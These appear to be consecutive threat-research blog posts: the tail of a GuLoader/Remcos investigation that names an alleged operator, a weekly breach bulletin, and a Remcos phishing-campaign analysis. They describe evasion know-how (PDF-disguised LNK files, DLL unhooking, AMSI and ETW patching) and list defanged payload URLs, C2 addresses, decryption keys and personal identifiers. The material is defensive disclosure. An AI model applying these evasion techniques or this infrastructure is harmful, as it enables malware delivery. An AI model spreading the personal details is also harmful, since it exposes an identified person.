As of this writing, the URL “hxxp://194[.180.48.211/nini/EAbsGhbSQL10.aca” was still active. Therefore, we were able to download the final payload (SHA256 7bd663ea34e358050986bde528612039f476f3b315ee169c79359177a8d01e03). We used the key extracted from the GuLoader shellcode to decrypt it. The decrypted sample appeared to be the Remcos RAT with SHA256 25c45221a9475246e20845430bdd63b513a9a9a73ed447bd7935ff9ecee5a61e.

Figure 18 – Restored part of the GuLoader attack chain.

We extracted and decrypted the C&C configuration from this Remcos sample and found it contains an address of the C&C server “84.21.172.49:1040” that we previously saw in the video:

Figure 19 – Decrypted Remcos C&C configuration.

Finally, using the VirusTotal Relations tab for the initially found GuLoader VBS sample “Leekish.vbs“, we also discovered a URL from which the file was downloaded: “hxxp://194.180.48.211/nini/Leekish.vbs“. This address was also revealed in the video at the 01:37 mark:

Figure 20 – URL for downloading the initial VBS sample found on VirusTotal.

Another interesting social engineering trick demonstrated in the video (frame 00:45) is the manipulation of the LNK file to mislead the user into believing it is a PDF document. Even when the user hovers over the LNK file, the tooltip shows, “Type: PDF Document.” In addition, if the user double-clicks on the LNK file, it actually opens a decoy PDF file, while the malicious process runs silently in the background.

This is accomplished through the following simple steps:

1. The file extension is changed to “.pdf.lnk”, taking advantage of the file extensions hidden by default.
2. The LNK description is modified to display “PDF Document”, exploiting the fact that Windows shows the contents of the shortcut Description field. Note that the size displayed in the tooltip differs from the actual file size. The tooltip shows “Size: 7.11Kb” which is taken from the Description field of the shortcut, while the file size is actually 3Kb.
3. The icon source is changed to show the PDF icon.
4. The LNK file also downloads and executes a decoy PDF file.

Figure 21 – LNK file disguised as a PDF document.

We found an LNK file on VirusTotal (SHA256: 63559daa72c778e9657ca53e2a72deb541cdec3e0d36ecf04d15ddbf3786aea8) that refers to the mentioned URL and contains exactly the same Description field:

Figure 22 – Parsed LNK file.

This malicious shortcut file utilizes the ability of the legitimate script SyncAppvPublishingServer.vbs that is present in Windows System32 folder to run arbitrary PowerShell commands. The command line arguments contain PowerShell commands to download and run the malicious script “Leekish.vbs” and a PDF decoy. The PDF icon from the msedge.exe file is used as the shortcut icon.

So, we have restored the complete attack chain demonstrated in the video and identified most of the files and components involved. The “script protected file” mentioned in the video appears to be the Remcos RAT with a C&C server at “84.21.172.48:1040″. We identified the protector as the VBS version of GuLoader:

Figure 23 – Complete attack chain shown on the video from the VgoStore Telegram group.

This attack chain is similar to what we have already seen from previous attacks of GuLoader, as was also described in the RedCanary blog.

This VBS and the LNK samples are particularly intriguing because we came across them as part of an attack targeting CPAs and accountants during the US tax season in the past year (February 2023). The aforementioned indicators of compromise (IOCs) can be found listed in the Securonix and Sophos blogs.

TheProtect NSIS variant

VgoStore also has a YouTube channel (https://www.youtube.com/@VgoStore). The video “Lnk Exploit” published on April 12, 2023, is very similar to the video that we analyzed above. The presenter downloads an archive containing an LNK file and runs this LNK file. As shown on the video, at the same time, all recent Windows updates are installed, and security features are enabled. Just as in the previous case, if we stop the video at 2:11 we can see a command line of the powershell.exe process created as a result of running the LNK file.

Figure 24 – Command line containing URLs.

The process command line in the screenshot above contains 2 URLs. As of this writing, both URLs were active, which allowed us to download the files.

One of the samples is a decoy PDF, the second one is an NSIS installer package.

Figure 25 – VirusTotal report for the sample demonstrated on the EMINэM’s video.

We were able to classify this file as the NSIS variant of GuLoader and decrypted its configuration. In this GuLoader sample’s configuration, we found a URL with the same IP address but with a different path:

Figure 26 – Decrypted GuLoader configuration.

The URL for downloading the GuLoader payload “hxxp://194[.180.48.211/ray/BdNnKAT84.bin” is no longer active, so we used VirusTotal to obtain the encrypted payload (SHA256: de11c14925357a978c48c54b3b294d5ab59cffc6efabdae0acd1a17033fe6483). We decrypted the final payload, and it appears to be the Remcos RAT (SHA256: 83df18f8e28f779b19170d2ca707aa3dbcee231736c26f8ba4fbd8768cd26ba6) with the C&C sever address “mazzancollttyde.business:7060” (185.126.237.209):

Figure 27 – Decrypted Remcos C&C configuration.

It turns out that in this case, GuLoader was also used for the delivery of the Remсos RAT, but this time the NSIS variant.

Through the analysis of these two videos, we were able to discover what type of payload was used. But most importantly, we saw that the executable files protected by “TheProtect” tool sold in VgoStore are identical to GuLoader. In these videos, we found both variants of GuLoader (NSIS and VBScript variants) that we have seen in the wild. Most likely, these variants correspond to the types of protection service that you can buy: The Protect: Private Protect (corresponding to the NSIS variant), and Script Protect (corresponding to the VBScript variant).

GuLoader from the VgoStore and connection with CloudEyE

When we conducted our research, our first concern was whether the samples we see now in 2023 are really the same GuLoader that we found a connection to CloudEyE from Securitycode.eu in 2020.

Indeed, GuLoader now looks really different. The execution does not involve VB6 application like it did in GuLoader from 2020. Now it is distributed in the form of a VBS script or NSIS executable. The only thing the 2020 and 2023 versions still have in common is the core of GuLoader functionality – the encrypted shellcode. However, this part also changed significantly. As we described in our previous article, the developers of GuLoader utilize new obfuscation techniques that mask the real execution flow and make automatic disassembling tools and debuggers fail to analyze the code. The new version also implements data obfuscation using arithmetic operations.

However, we still managed to find similarities in the code. In the screenshot below, you can see that both versions use an anti-debug trick: patching the DbgUiRemoteBreakIn and DbgBreakPoint functions. Despite the fact that the assembly code is very different due to the obfuscation in the new version, in both GuLoader versions from 2020 and 2023 the same bytes are used to overwrite the code of the functions that we can see after deobfuscating the code.

Figure 28 – Code similarities in GuLoader versions from 2020 and 2023.

In general, regarding anti-analysis techniques, the list is very similar in both versions. It is apparent the number of anti-analysis techniques expands with the release of each new version.

In addition, all versions of the shellcode use a large structure to store global variables that may be needed at various stages of shellcode execution. The base address of this structure is stored in the EBP register. The offsets of various variables in this structure changed between versions, while other offsets remain the same.

We considered 2 samples: the one we analyzed recently in 2023 (MD5: 40b9ca22013d02303d49d8f922ac2739) and the older one from 2020 (MD5: d621b39ec6294c998580cc21f33b2f46).

Figure 29 – Same offsets of API function pointers in the global structure in GuLoader from 2020 (CloudEyE) and GuLoader from 2023.

You can see that in both samples the offsets of the variables storing the addresses of many API functions are the same.

We also have samples of intermediate versions of GuLoader at our disposal, which we identified in 2021 and 2022. Let’s compare the code for the decryption routine that we extracted from the sample first seen in 2021 (MD5: abf39daaa33505f26959db465116f21f) with the routine in the 2023 GuLoader sample from the previous example (MD5: 40b9ca22013d02303d49d8f922ac2739). The assembly code in these functions is slightly different due to the obfuscation. However, if we use a decompiler, we get identical results for both samples.

Figure 30 – Same decompiled code in GuLoader versions from 2021 and 2023.

Our tools for automatic malware classification and configuration extraction identify these samples as GuLoader due to similar behavioral and code patterns.

Figure 31 – Samples from 2021, 2022 and 2023 are identified as GuLoader.

We used automated analysis to process more than 6 thousand GuLoader samples sorted by the date first seen and identify different versions of GuLoader. This also allowed us to build a timeline of GuLoader shellcode versions. In the chart below, we marked versions with significant changes in the algorithms for the encryption and obfuscation of data; strings, including the URL for downloading the payload; and payload decryption keys:

Figure 32 – Timeline of different GuLoader shellcode versions.

This chart shows that with each new version of the GuLoader shellcode, the number of samples of the old versions was considerably reduced. All the facts listed above allow us to unequivocally believe that the new versions of GuLoader, including the samples demonstrated by VgoStore, are still the same malware, whose connection with CloudEyE and Securitycode.eu we showed in 2020.

Who is behind BreakingSecurity and VgoStore

As we mentioned earlier, the user with the nickname “EMINэM” is a moderator of the official Telegram group of BreakingSecurity.net:

Figure 33 – EMINэM Telegram user details.

We can see very specific artifacts in the videos posted by EMINэM. Among them are custom icons for “This PC” and the folder “EM1NeM” on the desktop, as well as a very specific desktop background related to Mortal Kombat:

Figure 34 – EMINэM’s desktop artifacts.

We can use these to identify videos created by EMINэM.

Let’s now move to the @VgoStore_Group. Among the administrators of this group, we can see two users: EMINэM (with a custom title “Trusted Vendor”) and VGO (@VgoStore):

Figure 35 – VgoStore Telegram group administrators.

VGO and EMINэM pretend to be different users. We can even find a “conversation” between them in this group:

Figure 36 – “Conversation” between VGO and EMINэM.

However, if we carefully watch the videos posted by the user VGO, we notice the same artifacts we found posted by the user EMINэM:

Figure 37 – EMINэM’s desktop on a video posted by VGO.

Regarding the artifacts of the EMINэM’s desktop in this video, we noticed one more detail. We see the user connects to a remote host through WinSCP and opens the folder “/var/www/html/zarath“. We found an open directory with the same name on the host “194.180.48.211” that we discovered while analyzing the video in which the user VGO demonstrated the VBS variant of TheProtect that we identified as GuLoader.

Based on this, we can assume that both BreakingSecurity and VgoStore Telegram groups are controlled by the same person, and that he also owns both accounts – EMINэM and VGO.

Next, we tried to search “VgoStore” in Google, and found the user “vgostore” asking for help with WordPress plugins at the “wordpress.org” website forum. During the conversation, the user published links for two unlisted YouTube videos that belong to the YouTube user “EMINe M” (@BreakingSecurity):

Figure 38 – Unlisted YouTube videos published by EMINэM at the “wordpress.org” website forum.

In the beginning of the video “2023 01 26 15 18 16” (https://www.youtube.com/watch?v=L8yB_xybTPs), we see the familiar Mortal Kombat wallpaper that we saw on EMINэM’s desktop on other videos. We can also see the IP address “173.212.217.108” of the remote desktop through which EMINэM accesses the web hosting panel and email “abudllah.alshamsy(at)gmail[.]com“:

Figure 39 – IP address of the server managed by EMINэM via remote desktop.

In the second video (“2023 01 26 20 02 07“, https://www.youtube.com/watch?v=KHp07C3DgWo) we observe the VgoStore WordPress admin panel, and the “Orders” tabs of both BreakingSecurity and VgoStore open simultaneously:

Figure 40 – “Orders” tabs of both BreakingSecurity and VgoStore open simultaneously in EMINэM’s video.

Despite the attempts to conceal any direct affiliation to VgoStore, EMINэM turns out to be the manager of both the BreakingSecurity and VgoStore websites and Telegram groups.

EMINэM’s identity

One of the videos published by EMINэM on the WordPress forum (“2023 01 26 15 18 16“, https://www.youtube.com/watch?v=L8yB_xybTPs) is quite long. During the recording, EMINэM repeatedly switched between different windows, and some of the frames showed sensitive data that helped our investigation. The carelessness with which EMINэM treats information security suggests that he thinks he has nothing to fear from the law.

EMINэM uses the name “Rabea Akram” for his email (expert.eminem@gmail[.]com) and in the communications related to websites administration (5:38):

Figure 41 – EMINэM’s fake name used in relation to the websites he administers.

On the same video at 10:36 we can see EMINэM booked a flight under the name “Shadi Gharz Elddin”:

Figure 42 – EMINэM’s real name in the flight booking confirmation email.

We easily found the Facebook and Twitter accounts of Shadi Gharz, on which he openly writes that his place of work is BreakingSecurity:

Figure 43 – Shadi Gharz social network page.

Knowing that EMINэM’s real name is Shadi, we can assume that the source for choosing the nickname “EMINэM” most likely was the song “The Real Slim Shady” by the artist Eminem.

Malicious activity conducted by EMINэM

In addition to the previously mentioned samples which were utilized in attacks specifically targeting CPAs and accountants during the US tax season (SHA256: 63559daa72c778e9657ca53e2a72deb541cdec3e0d36ecf04d15ddbf3786aea8, c914dab00f2b1d63c50eb217eeb29bcd5fe20b4e61538b0d9d052ff1b746fd73), we discovered that EMINэM is the individual responsible for orchestrating numerous attacks over the past few years. Let us examine some of these attacks.

1. In a video https://youtu.be/5xpYjLbDpnE?t=84 posted by Eminem in 2021, at mark 1:24 we see the browser history records:

Figure 44 – EMINэM’s browser history entries contain addresses of Formbook C&C servers.

This list above contains addresses of Formbook info stealer panels used to control bots and retrieve stolen data. Here is a list of Formbook samples using C&C servers with the given addresses:

2. In different videos published by EMINэM, we noticed several IP addresses of the servers that he manages through RDP or SFTP.

We were able to download the current contents of the open directory “hxxp://194.180.48.211/zarath/” mentioned above:

Figure 45 – Contents of “194.180.48.211/zarath/”.

We identified a portion of the files in this folder as GuLoader encrypted shellcode, and the rest as encrypted payloads, most of which are Remcos. While the developers may claim that Remcos and GuLoader (CloudEyE, TheProtect) are legitimate software, we also found two truly malicious payloads in this folder that we identified as Amadey Loader, and the corresponding GuLoader shellcodes that load and decrypt those payloads:

3. In a video posted by EMINэM in the @BreakingSecurity_Group Telegram group on April 19, 2022, we see how he connects to a remote server named “CaliPB” and the IP address “38.242.193.23” as a root user (which means that he is the owner of this server):

Figure 46 – EMINэM connects to his server as a root user using WinSCP.

In the next screenshot we see the contents of the “/var/www/html” folder, which is accessible through the web. Our attention was attracted by a subfolder named “private“:

Figure 47 – Contents of folder “/var/www/html” on the EMINэM’s server.

Unfortunately, the contents of the “private” folder could not be retrieved. However, we were still able to find related samples using VirusTotal.

We analyzed samples previously downloaded from the host “38.242.193.23“. Among them, we found GuLoader and Remcos:

In this table, we again see the IP addresses “194.180.48.211”, “173.212.217.108” that we connected with EMINэM earlier. But now we see the new IP address “185.217.1.137” used as a Remcos C&C server. This IP address belongs to nVPN, which provides port forwarding service, and is likely used by EMINэM to hide the real IP address of his Remcos C&C server. Our assumption is confirmed by the fact that on one of the videos, we saw a letter from nVPN in EMINэM’s mailbox:

Figure 48 – nVpn.net confirmation email received by EMINэM.

We also found a domain name “vrezvrez.com” that was resolved to the IP address “38.242.193.23” during the period when this video was recorded.

We found five Formbook samples of version 4.1 with the C&C server URL “vrezvrez.com/private/”:

Therefore, the evidence shows a comprehensive case for the involvement of Eminem in carrying out attacks not only with Remcos and GuLoader but also using well-known malware such as Formbook and Amadey Loader.

Revenue

The unlisted YouTube video “2023 01 26 15 18 16” uploaded by EMINэM that we found on the WordPress forum contains a lot more data that helped us in our investigation. At 5:41 we see the inbox of EMINэM’s Gmail account. We paid attention to the email from the service “tochkaobmena.com”. On the video it was possible to recover the link from the email:

https://tochkaobmena.com/hst_FhaMv1rUzBTMfXlgR71vRjafr47K0wQyjuF/

Figure 49 – The digital currency exchange confirmation contains a URL.

We followed the link and found the page with the results of the digital assets exchange operation (Perfect Money USD -> Tron USDT) that contains a Tron blockchain wallet address:

TLqC6F4AVs8MrdiQDgRuFcW2Xp3iY3hg2D

We analyzed incoming transactions and calculated the total amount received by this account during the last 365 days: USDT 59,685.08.

However, it is obvious that only part of the BreakingSecurity and VgoStore finances flow through this wallet. We can get a better view of the income VgoStore received thanks to another frame in this video. At 5:06 we see the WordPress administrative page containing the report of the WooCommerce plugin:

Figure 50 – WordPress administrative page displays sales statistics.

The amount of $ 15,000 may be considered an estimate of the monthly income from sales of Remcos and other services at the VgoStore website.

Conclusion

Tools such as Remcos and GuLoader, once exclusively sold on hacking forums and now publicly available on e-commerce, masquerade as legitimate products. Now easily accessible, such tools have become popular among individuals with malicious intentions.

Our findings reveal that an individual operating under the alias EMINэM administers both websites BreakingSecurity and VgoStore that openly sell Remcos and GuLoader under a new name, TheProtect. We also uncovered proof of EMINэM’s involvement in the distribution of malware, including the notorious Formbook info stealer and Amadey Loader. At the same time, EMINэM employs TheProtect for his own malicious purposes, exploiting its ability to bypass antivirus software.

In light of these findings, it becomes evident that the veneer of legitimacy cultivated by BreakingSecurity, VgoStore, and their products is nothing more than a smokescreen. The individuals behind these services are deeply entwined within the cybercriminal community, leveraging their platforms to facilitate illegal activities and profit from the sale of malware-laden tools.

This serves as a stark reminder that the fight against cybercrime requires constant vigilance and collaboration. Law enforcement agencies, cybersecurity professionals, and the broader community must join forces to expose and neutralize these threats. By shining a light on the nefarious activities of individuals like EMINэM and their associated platforms, we take a step towards a safer digital landscape that can better protect individuals, organizations, and our shared digital ecosystem.

Check Point Threat Emulation provides protection against these threats:

• Dropper.Win.CloudEyE.*
• Dropper.Win.Guloader.*
• RAT.Win.Remcos.*

The post Unveiling the Shadows: The Dark Alliance between GuLoader and Remcos appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 11th September, please download our Threat_Intelligence Bulletin.

TOP ATTACKS AND BREACHES

• The American resort, casino and hotel chain MGM has suffered a cyber-attack that resulted in widespread disruption across the company’s hotels and casinos, and has shut down its internal networks as a precaution. The cyber-attack paralyzed the company’s ATMs, slot machines, room digital key cards and electronic payment systems. ALPHV ransomware affiliate, has claimed responsibility for the attack. Check Point Research is sharing its analysis insights on the activity of the ALPHV group during the last 12 month.
• The European aerospace giant Airbus has disclosed a data breach that potentially resulted in the exposure of 3,200 sensitive Airbus vendors’ contact information, including names, addresses, phone numbers and email addresses. The breach was claimed by the notorious ransomware group called Ransomed that have targeted many companies with ransomware attacks during September 2023.
• Sri Lanka’s government has been a victim of a ransomware attack that affected its cloud system, Lanka Government Cloud (LGC). The government has lost 3 months of data after restoring a backup of the cloud environment as a response to the breach. The data was erased from nearly 5K email addresses, including ones belonging to top government officials. No ransomware gang has claimed responsibility for the attack yet.
• BianLian ransomware gang has claimed responsibility for a cyber-attack on the world’s leading non-profit organization Save the Children International. The threat actors claim to have stolen almost 7TB of data, including 800GB of the charity’s financial data, human resources data, and personal information such as health and medical data, as well as email correspondence.
• Giant software bug-tracking company Rollbar, which is used by more than 400 million end users of applications and numerous global companies, has confirmed a data breach. The threat actors have infiltrated the company’s systems and gained access to sensitive clients’ information, including usernames, email addresses, account names and project details.
• The International Joint Commission (IJC) has been a victim of a cyber-attack that affected the water levels and flows across US-Canada border. The NoEscape ransomware gang has claimed responsibility for the attack, claiming to have stolen 80GB of data, including contracts, geological files, conflict of interest forms and more.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware_Linux_NoEscape; Ransomware.Win.NoEscape)

VULNERABILITIES AND PATCHES

• Adobe’s Patch Tuesday update for September 2023 has been released, providing a fix for the critical zero-day vulnerability in Adobe Acrobat and Reader (CVE-2023-26369). Successful exploitation of this bug could lead to code execution by opening a specially crafted PDF document.

Check Point IPS provides protection against this threat (Adobe Acrobat and Reader Out-of-bounds Write (APSB23-34: CVE-2023-26369))

• Microsoft has released fixes for 59 bugs, including two zero-day flaws in Microsoft Word (CVE-2023-36761) and Microsoft Streaming Service Proxy (CVE-2023-36802).

Check Point IPS provides protection against this threat (Microsoft Streaming Service Proxy Elevation of Privilege (CVE-2023-36802))

• A new vulnerability in GitHub was discovered, exploiting a race condition within GitHub’s repository creation and username renaming operations. Successful exploitation of this vulnerability could allow an attacker to perform a Repojacking attack (hijacking popular repositories to distribute malicious code).
• Google has patched a critical zero-day heap buffer overflow vulnerability in WebP (tracked as CVE-2023-4863). The vulnerability is suspected to be related to the recently discovered Pegasus zero-day vulnerabilities in Apple products.

THREAT INTELLIGENCE REPORTS

• Check Point Research have encountered a new large-scale phishing campaign that targeted more than 40 prominent companies across multiple industries in Colombia. The attackers’ objective was to discreetly install the sophisticated Remcos malware on victims’ computers, which grants full control over the infected machine and can be used in a variety of attacks.

Check Point Threat Emulation provides protection against this threat (Technique.Win.Unhooking; Technique.Win.WrongFileExt; Technique.Win.UnhookingNtdll)

• Check Point Research has released August 2023’s Most Wanted Malware report, highlighting a new ChromeLoader campaign named “Shampoo” which targets Chrome browser users with malware-loaded fake ads. In addition, Qbot (aka Qakbot), which was the most prevalent malware last month with an impact of 5% worldwide organizations, has been shut down by the FBI.
• Microsoft warns of a new phishing campaign conducted by Storm-0324 (aka DEV-0324, TA543 and Sagrid), an initial access broker group using email-based initial infection vectors, and usually sells accesses to ransomware operations including FIN7 (aka Sangria Tempest, ELBRUS, Carbon Spider). The latest campaign is using Teams messages as lures to infiltrate corporate networks.

The post 18th September – Threat Intelligence Report appeared first on Check Point Research.

Research by: Niv Asraf

Abstract

In the last two months, Check Point researchers encountered a new large-scale phishing campaign that recently targeted more than 40 prominent companies across multiple industries, in Colombia. The attackers’ objective was to discreetly install the notorious “Remcos” malware on victims’ computers. Remcos, a sophisticated “Swiss Army Knife” RAT, grants attackers full control over the infected computer and can be used in a variety of attacks. Common consequences of a Remcos infection include data theft, follow-up infections, and account takeover. In our report, we delve into the attack intricacies and highlight the stealthy techniques employed by the malicious actors.

Attack Flow

1. Fraudulent Email:

The attackers initiated the campaign by sending deceptive emails allegedly from trusted entities, including reputable financial institutions and corporations operating within Colombia. These malicious emails were crafted to appear genuine, often containing urgent notifications, reports of overdue debts, or enticing offers.

1. Email Contains an Archive File:

The phishing email contains an attachment that appears to be a harmless archive file, such as ZIP, RAR or TGZ. The attachment label states that it contains important documents, invoices, or other enticing information to encourage the recipients to open it.

• Highly Obfuscated BAT File with PowerShell Commands:

The archive file contains a highly obfuscated Batch (BAT) file. Upon execution, the BAT file runs PowerShell commands which are also heavily obfuscated. This multi-layer obfuscation makes it difficult for security solutions to detect and analyze the malicious payload.

• Loading .NET Modules:

After the PowerShell commands are deciphered, they load two .NET modules into memory. These modules are essential for the subsequent stages of the attack.

• First .NET Module: Evasion and Unhooking:

The first .NET module’s primary purpose is to evade detection and unhook any security mechanisms present in the targeted system. By removing or bypassing security hooks, the attackers increase the malware’s chances of remaining undetected and enable it to operate stealthily.

• Second .NET Module: Loading “LoadPE” and Remcos:

The second .NET module dynamically loads another component called “LoadPE” from the file resources. “LoadPE” is responsible for reflective loading, a technique that allows the loading of a Portable Executable (PE) file (in this case, the Remcos malware) directly into memory without the need for it to be stored on the disk.

• Reflective Loading with “LoadPE”:

Using the “LoadPE” component, the attackers load the final payload, the Remcos malware, directly from their resources into the memory. This reflective loading technique further enhances the malware’s ability to evade traditional antivirus and endpoint security solutions, as it bypasses standard file-based detection mechanisms.

• The Final Payload: Remcos – Swiss Army Knife RAT:

With the successful loading of the Remcos malware into memory, the attack is now complete. Remcos, a potent Remote Administration Tool (RAT), grants the attackers full control over the compromised system. It serves as a Swiss Army Knife for the attackers, allowing them to execute a wide range of malicious activities, including unauthorized access, data exfiltration, keylogging, remote surveillance, and more.

Technical Analysis

In the following sections, we examine the technical aspects of the observed issues. We focus on the malware’s evasion techniques and the deobfuscation process we employed to uncover the true nature of the BAT and .NET modules.

Our analysis starts with the malicious BAT file from attack chain stage 3 above.

After deobfuscating parts of the BAT file code with a Python script, the only thing we’re interested in is the last two lines of code:

Figure 4:The last two lines of deobfuscated BAT file.

The first line is responsible for copying the PowerShell executable to the current folder, abusing a double extension in the filename in order to hide the true file type.

And the second line of code looks like a heavily obfuscated PowerShell code.

After we organized and deobfuscated the PowerShell code, this is what we got:

Figure 5: Deobfuscated PowerShell code.

There are two functions here:

1. “Zoskj” is responsible for decrypting the payload using AES CBC mode.
2. “oPueH” uses GZIP to decompress it.

The flow is to first decode the Base64, and then decrypt it using AES. The last step is to decompress it.

AES key: Bh25J//GchqJk6Loyw9E05onwOgPl+4pjflSE6q18Hk=

AES IV: dQVwOVWNZWJ4TULVM0QMqQ==

Finally, after resolving the two .NET executables, they are both loaded in the memory:

Figure 6: Load 2 .NET executables to the memory

Figure 6: Load 2 .NET executables to the memory

We wanted to see why the attackers split the payload into two .NET executables and if there is a meaning to the order in which they are loaded.

Looking at the first .NET executable, we can see that it is highly obfuscated and almost unreadable.

Figure 7: First .NET obfuscated executable.

While this obfuscation is unknown, we can still use “de4dot” to make it a little bit more readable and then perform further deobfuscation.

de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#.

Figure 8: First .NET obfuscated executable after using de4dot.

The prominent pattern we observed involves deliberately enlarging the size of the code making it more complicated by extensively using Math.Abs/Min methods and adding numerous parentheses. Fortunately, we do not need to perform actual calculations; the values inside these methods directly serve as the final parameters passed into the “smethods_*” functions.

The first interesting thing we noticed here is the unknown strings (outlined in red in Figure 8) that are always passed into “smethod_0”. From this we understand that it is probably a string decryption function.

Looking at the function itself, we can see that only the string_0 and int_1 arguments are being used in the “for” loop, which is the only part of the code that is relevant here.

Basically, the function takes each “char” from the strings, turns it into an int and subtracts from it the int_1 argument, then converts the resulting value to char and appends it to the “stringBuilder”.

We created our own string decryption method in Python:

Figure 10: String decryption method in Python.

In the Figure 10 example, the return value is “ntdll.dll”.

So now, we can decrypt all unknown strings.

In addition, before the “Main” function executes, we see a lot of dynamically resolved functions assigned to delegated pointer variables to use in the code.

If we decrypt those strings, we can understand what the functions are, and rename the obfuscated delegated names.

Figure 11: Example of the “CloseHandle” function pointer being assigned.

After resolving and renaming, we get these function variables:

Figure 12: Decrypted delegated function pointers.

Now that we decrypted all the pointers, we can reverse-engineer the other methods and understand the flow of the main function.

Let’s analyze the function that receives the decrypted string “ntdll.dll”.

Figure 13: Choose the right ntdll based on IsWow64Process.

Looking at the first chunk of code, we can see two encrypted strings which translate to:

“C:\Windows\System32\” and “C:\Windows\SysWOW64”

We also see a delegated function pointer that we resolved earlier, IsWow64Process.

This checks whether the process runs under wow64, so we can use the right ntdll to read from the disk.

Figure 14: Unhooking DLL.

Although this function is still obfuscated, we can analyze and understand the code’s purpose, which is unhooking DLLs that are received as an argument to the function.

This is what happens here:

• Get a handle to the already-hooked library.
• Map a fresh copy of the relevant DLL into memory.
• Replace the .text section of the hooked DLL with the new one from the disk.

Figure 15: Unhooking.

VirtualProtect is used to change the .text section protection, using memcpy to copy the new unhooked section, and finally return to the old protection.

Now we can safely change the function name to UnhookModule.

This is the last major function of this executable:

Figure 16: Patching functions in memory with code that returns an error code.

This function takes a few arguments: Dll Name, Function Name, and a Byte Sequence.

It is responsible for patching functions in memory with code that returns an error code: 0x80070057 “The parameter is incorrect”.

To summarize, this is the first .NET Main Functionality:

• Unhooking kernel32.dll
• Unhooking ntdll.dll
• Patching the amsi.dll AmsiScanBuffer function to return “The parameter is incorrect” code (0x80070057)
• Patching the ntdll.dll EtwEventWrite function to return “The parameter is incorrect” code (0x80070057)

The second .NET is also heavily obfuscated but now the code size is much smaller. In addition, now that we understand the way the obfuscation works, it is much easier to understand its content.

Figure 17: Reversed and deobfuscated second .NET module.

To summarize, this is the second .NET Main Functionality:

• Check if there is a debugger.
• Use PowerShell to wait for the process to end and then delete the main module file.
• Load two additional files from the resources:
  • Remcos malware
  • LoadPE .NET executable

At the end of the Main function, the final payload, Remcos, is assigned to the “array” variable and then is passed as an argument to another invoked .NET executable, the “LoadPE” exe, which is responsible for getting an executable as an argument and loading it using reflective loading.

As we mentioned earlier in this report, reflective loading is used to dynamically load a library or executable directly into memory without relying on the standard operating system mechanisms for loading files from the disk.

In malware, reflective loading is often employed as a stealthy way to execute malicious code without writing any files to the disk. This makes it harder for traditional security tools to detect the presence of the malware as there are no files that can be scanned or monitored. Reflective loading also makes it harder to identify and analyze the malicious code.

The third LoadPE .NET executable is not obfuscated at all, which means we can easily reverse-engineer and understand what it’s used for.

These are its functions:

Figure 18: LoadPE .NET functions.

The final payload, the Remcos malware, stores its encrypted configuration file, called “SETTING”, in the resources.

We can easily see the configuration in memory:

Figure 19: Remcos configuration in memory.

Summary of the Remcos configuration:

Host:Port:Password: “192[.]161[.]184[.]21:24050:1”

Assigned name: “Vps”

Copy file: “remcos.exe”

Startup value: “Remcos”

Mutex: “Rmcvps-JUECXT”

Keylog file: “vpslogs.dat”

Screenshot file: “Screenshots”

Audio folder: “MicRecords”

Copy folder: “Remcos”

Keylog folder: “vp”

Keylog file max size: “100000”

We wanted to see if our assumptions were correct, so we entered the word “password” and also ”xxxx” and “123123”, then checked the keylogging file. As you can see, we were right.

Figure 20: Keylogging in action.

Conclusion

Our analysis offers a glimpse into the intricate world of evasion techniques and deobfuscation procedures employed by attackers. By deciphering the hidden functionalities of the malicious BAT and .NET modules, we were able to shed light on the attack flow’s complexity. Understanding these technical intricacies is essential for enhancing cybersecurity defenses and devising effective countermeasures to protect against such advanced phishing campaigns.

Check Point customers remain protected from the threats described in this research.

Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems and has developed and deployed a signature to detect and protect customers against threats described in this research.

Threat Emulation:

Technique.Win.Unhooking.B

Technique.Win.WrongFileExt.A

Technique.Win.UnhookingNtdll.A

IOCs

C2 IOC:
192[.]161[.]184[.]21

BAT IOC’s:
dbc8cd0d565c9fa45a0f0ce030f609cfbc8dcc49
747c2466b4f4b5024f321a07fca597824d2483f8
3903cd20c6e72582f0ce3457a8964c6d9bc7496d
091a54d15376e86860ed52f3dcb5d3ded457e669
5d41cad361e530512a4bc8f394f5447fdcd19c1b
66e261009a745aeb0ed753cc920fca12880d5153
6bd967409c612466686e60dd409183a014171bf4
84668e4bb3b9366a8fd0856a6dc2a76a341589db
879b86cdf85c67b99c2f45afbaba8e4967a36065
0f0e747e23c98467bf825f8ef0dd1ab2eacb1169
1b9d6935421026676f2e39332894e61406768100
4d83ca1c2133425e1f87ea4729f40f17beeac8e2
5183b062a48926e20deef57a4d1819be62985803
796b5b5f2a9bffb777b46066e7167813dc53d344
9ec5ece2add690e3bca1a7ef84a73e10e326f39f
e543fd34e50bba41b422095dae1582d3e90718a3

RAR IOC’s:
ef1cc1750f5f580aa9338b8c5c5125cfd8406f7b
06c4ae8f298943340466a5dd1a6d44491349dc89
cf175cf4550280e43c6b094561fbe2925808a86e
1af2877ea0f103c0eb7a022616274b06dff387b1
30c4ede9a6f31c88b2ae1c0934a6be2dd85c4fcb
3b1d15c94f8a444cdeded4cb1fdc67835a3eb22f
4ad0661ce27ad4e738fac9df6399dade735aab75
59358571cc8679f945477d4616b853081e90f128
a0e0dd39ea5af2fc05fa0381d7f690840f726237
a738e73eb43b2b13d571bbec921364ef7c0fe89b
c464353ea1206bf98d74294846d44dcc77abd266
de47ac28807ef5ddf0baac89b833d629365b69fa
f0225203ef06dd74c5619e787bcb842bfee21715
f637469861d7933ca1e0b5940cd65008fe852ae6
07106f6c27f3f9111f6772be99c13a6d4c9086f9
0eb80eca7ce0ce7eb2247e5bc4f1fca0050c6c9a
10b4b1042cecb095b4290b585f3813d962363b80
114fdf1d2bb70d0701c3843a1ef6b85c312cb293
137424047b1b536d84fa67b57af530c2d0f7e103
1d50d5066bb37491b56c05b196a569740b1dfae0
1e7535f915f5feaa3efa9454595143287620d2dd
1f617be60cf587d9b4148b99330fe41ec13f9a0f
21f1c5fec49abbe72669d0b24332c1dc19655afc
273aad18bc2b709926857dfeb2004a6023e3801f
289da12f6a23df7ceec631db4222138934973f17
2990974b141cbd7f93331dc7ae99c8ce00768829
2cc559b88c1417bb706c1bdf2da899c4a906b96f
2e03467eb027b820d6414377c4cde1faed41f53d
2f82901f0467e2c1ca4c876f0718ab0054ee8665
2facc6928c6e6e1d934c342f8d0ecdb590227f6e
3030026cf11a87685b53b4339de628012a4ebb8c
32923f96042f5288a47bf44e6a70a2ad1a88e40e
33b3128ec42305c9df027a1b27ec776f87549178
